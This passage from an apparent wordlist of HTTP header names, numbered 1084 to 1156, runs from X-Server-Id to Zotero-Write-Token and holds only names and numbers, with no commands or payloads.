X-Server-Id 1084 | X-Server-Name 1085 | X-Server-Port 1086 | X-Signature 1087 | X-Sina-Proxyuser 1088 | X-Skyfire-Phone 1089 | X-Skyfire-Screen 1090 | X-Ssl 1091 | X-Subdomain 1092 | X-Te 1093 | X-Teamsite-Preremap 1094 | X-Test-Session-Id 1095 | X-Timer 1096 | X-Tine20-Jsonkey 1097 | X-Tine20-Request-Type 1098 | X-Tomboy-Client 1099 | X-Tor 1100 | X-Twilio-Signature 1101 | X-Ua-Device 1102 | X-Ucbrowser-Device-Ua 1103 | X-Uidh 1104 | X-UIDH 1105 | X-Unique-Id 1106 | X-Uniquewcid 1107 | X-Up-Calling-Line-Id 1108 | X-Update 1109 | X-Update-Range 1110 | X-Up-Devcap-Iscolor 1111 | X-Up-Devcap-Screendepth 1112 | X-Up-Devcap-Screenpixels 1113 | X-Upload-Maxresolution 1114 | X-Upload-Name 1115 | X-Upload-Size 1116 | X-Upload-Type 1117 | X-Up-Subno 1118 | X-Url-Scheme 1119 | X-User 1120 | X-User-Agent 1121 | X-Username 1122 | X-Varnish 1123 | X-Verify-Credentials-Authorization 1124 | X-Vodafone-3gpdpcontext 1125 | X-Wap-Clientid 1126 | X-Wap-Client-Sdu-Size 1127 | X-Wap-Gateway 1128 | X-Wap-Network-Client-Ip 1129 | X-Wap-Network-Client-Msisdn 1130 | x-wap-profile 1131 | X-Wap-Profile 1132 | X-Wap-Proxy-Cookie 1133 | X-Wap-Session-Id 1134 | X-Wap-Tod 1135 | X-Wap-Tod-Coded 1136 | X-Whatever 1137 | X-Wikimedia-Debug 1138 | X-Wp-Nonce 1139 | X-Wp-Pjax-Prefetch 1140 | X-Ws-Api-Key 1141 | X-Xc-Schema-Version 1142 | X-Xhprof-Debug 1143 | X-Xhr-Referer 1144 | X-Xmlhttprequest 1145 | X-Xpid 1146 | X-XSRF-TOKEN 1147 | X-XSS-Protection 1148 | Xxx-Real-Ip 1149 | Xxxxxxxxxxxxxxx 1150 | X-Zikula-Ajax-Token 1151 | X-Zotero-Version 1152 | X-Ztgo-Bearerinfo 1153 | Y 1154 | Zotero-Api-Version 1155 | Zotero-Write-Token 1156 | --------------------------------------------------------------------------------